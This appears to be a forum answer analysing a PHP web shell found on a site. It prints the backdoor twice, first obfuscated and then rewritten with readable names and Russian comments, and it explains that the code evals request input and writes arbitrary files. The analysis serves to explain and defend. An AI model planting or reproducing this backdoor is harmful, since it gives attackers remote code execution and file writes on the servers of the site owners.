We will sort through
<?php $vycv = "d4e147814c9311b6503b572e484a4bb2"; if(isset($_REQUEST['mmjzvk'])) { $oaxa = $_REQUEST['mmjzvk']; eval($oaxa); exit(); } if(isset($_REQUEST['emgakm'])) { $bhiu = $_REQUEST['hzxzunoh']; $ygvi = $_REQUEST['emgakm']; $kihku = fopen($ygvi, 'w'); $wbmgoq = fwrite($kihku, $bhiu); fclose($kihku); echo $wbmgoq; exit(); } ?>
That is, the script checks if there is a mmjzvk or emgakm parameter in the incoming data (in get, post or cookies). If the first is, then the value is treated as a php code and executed. If the second key is present ( emgakm ), then its value is interpreted as the name of the file to which the text is written, transmitted by the hzxzunoh key.
These two actions are sufficient for various destructive actions.
upd
Made "refactoring" :) I think the code should become clearer.
<?php $vycv = "d4e147814c9311b6503b572e484a4bb2"; // исполнить команду if(isset($_REQUEST['mmjzvk'])) { $command = $_REQUEST['mmjzvk']; // исполнить строку как php код. // http://php.net/manual/ru/function.eval.php eval($command); exit(); } // запись в файл if(isset($_REQUEST['emgakm'])) { $text = $_REQUEST['hzxzunoh']; $filename = $_REQUEST['emgakm']; // стандартный код записи текста в файл. $file_desc = fopen($filename, 'w'); $result = fwrite($file_desc, $text); fclose($file_desc); // вывод результата записи - либо кол-во записанных байт или false, если не получилось echo $result; exit(); } ?>
